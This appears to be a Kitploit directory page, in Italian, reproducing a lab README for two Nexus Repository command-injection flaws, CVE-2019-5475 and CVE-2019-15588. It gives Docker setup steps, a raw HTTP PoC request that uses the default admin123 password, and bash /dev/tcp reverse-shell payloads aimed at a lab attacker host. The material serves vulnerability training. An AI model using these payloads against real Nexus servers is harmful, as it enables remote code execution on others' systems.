Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-5475 — CVE-2019-5475 Campo di addestramento: Vulnerabilità di iniezione di comandi RCE | Kitploit
Strumenti/GitHubGitHub/exp-docs/cve-2019-5475
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubexp-docs/cve-2019-5475

CVE-2019-5475

CVE-2019-5475 Campo di addestramento: Vulnerabilità di iniezione di comandi RCE

Vedi Repository
5313 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-5475

Campi di tiro CVE-2019-5475 e CVE-2019-15588: Vulnerabilità di iniezione di comandi RCE


0x00 Sfondo

CVE-2019-5475 è una vulnerabilità di iniezione di comandi RCE in Nexus relativa al plugin integrato Yum Repository, originariamente divulgata su hackerone. Tuttavia, poiché la prima correzione ufficiale è stata incompleta, ne è derivata un'altra vulnerabilità, CVE-2019-15588.

Entrambe le vulnerabilità richiedono l'accesso come amministratore per essere sfruttate, ma la password di default dell'amministratore di Nexus (admin123) viene spesso trascurata e non modificata, rendendo facile lo sfruttamento.

0x10 Ambiente del campo di tiro

0x20 Struttura delle directory

root@kitploit:~
CVE-2019-5475
├── nexus-yum-core .......... [Progetto Maven per debug: simula l'inserimento di createrepo o mergerepo tramite GUI Nexus]
├── nexus ................... [Directory di montaggio dei dati del contenitore Nexus]
├── attacker ................ [Directory di build della macchina attaccante]
│   └── Dockerfile .......... [File di build Docker per la macchina attaccante]
├── docker-compose.yml ...... [Configurazione di build di Docker]
├── imgs .................... [Immagini per supportare la spiegazione del README]
└── README.md ............... [Questo file README]

0x40 Allestimento del campo di tiro

  • Il sistema host deve avere docker e docker-compose preinstallati
  • Scarica questo repository: git clone https://github.com/lyy289065406/CVE-2019-5475
  • Apri la directory di build di Nexus: cd CVE-2019-5475
  • Costruisci ed esegui Nexus: docker-compose up -d
  • Dopo circa 5 minuti, puoi accedere a Nexus dal browser (BasicAuth è admin/admin123), dove:
NexusCVEURL
2.14.9CVE-2019-5475http://127.0.0.1:8009/nexus
2.14.14CVE-2019-15588http://127.0.0.1:8014/nexus

Questo campo di tiro include anche una macchina attaccante 172.168.50.2, situata nella stessa rete delle due macchine bersaglio, utilizzata per verificare la reverse shell.

0x50 Verifica del campo di tiro per 【CVE-2019-5475】

0x51 PoC

Accedi come admin a http://127.0.0.1:8009/nexus/#capabilities, e in Administration -> Capabilities -> Yum: Configuration -> Settings si può trovare il punto di iniezione RCE.

Entrambi i campi di input Path of "createrepo" e Path of "mergerepo" possono essere iniettati, e il risultato dell'esecuzione può essere visto in Status.

Ad esempio, costruendo il PoC bash -c id || python nel punto di iniezione createrepo, si ottiene in Status il risultato del comando bash -c id: uid=200(nexus) gid=200(nexus) groups=200(nexus).

Tramite BurpSuite è possibile intercettare la richiesta PoC corrispondente:

root@kitploit:~
PUT /nexus/service/siesta/capabilities/RANDOM_ID HTTP/1.1
Host: 127.0.0.1:8009
accept: application/json
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Connection: close

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c id || python"}],"id":"RANDOM_ID"}

0x52 EXP

Questo punto di iniezione può essere facilmente sfruttato per creare una reverse shell:

  • Accedi alla macchina attaccante: docker exec -it -u root docker_attacker /bin/bash
  • Utilizza netcat per ascoltare la reverse shell: nc -lvvp 4444
  • Nel punto di iniezione createrepo sopra, costruisci il payload: bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || python

0x60 Verifica del campo di tiro per 【CVE-2019-15588】

0x61 PoC

Il punto di iniezione è lo stesso di CVE-2019-5475, modifica il PoC in: /bin/bash -c id || /createrepo

0x62 EXP

Questa vulnerabilità può essere sfruttata con lo stesso metodo per ottenere una reverse shell:

  • Accedi alla macchina attaccante: docker exec -it -u root docker_attacker /bin/bash
  • Utilizza netcat per ascoltare la reverse shell: nc -lvvp 4444
  • Nel punto di iniezione createrepo, costruisci il payload: /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || /createrepo

0x70 Correzione delle vulnerabilità

  • Per CVE-2019-5475: Prima patch di correzione ufficiale
  • Per CVE-2019-15588: Seconda patch di correzione ufficiale

0x80 Informazioni su nexus-yum-core

nexus-yum-core è un frammento di codice core di Nexus relativo allo sfruttamento di questa vulnerabilità, utilizzato principalmente per eseguire il debug e analizzare il payload inserito direttamente dal backend, senza dover configurare un servizio Nexus completo dal codice sorgente.

0x90 Riferimenti

  • https://paper.seebug.org/1260/
  • https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
Scarica lo strumento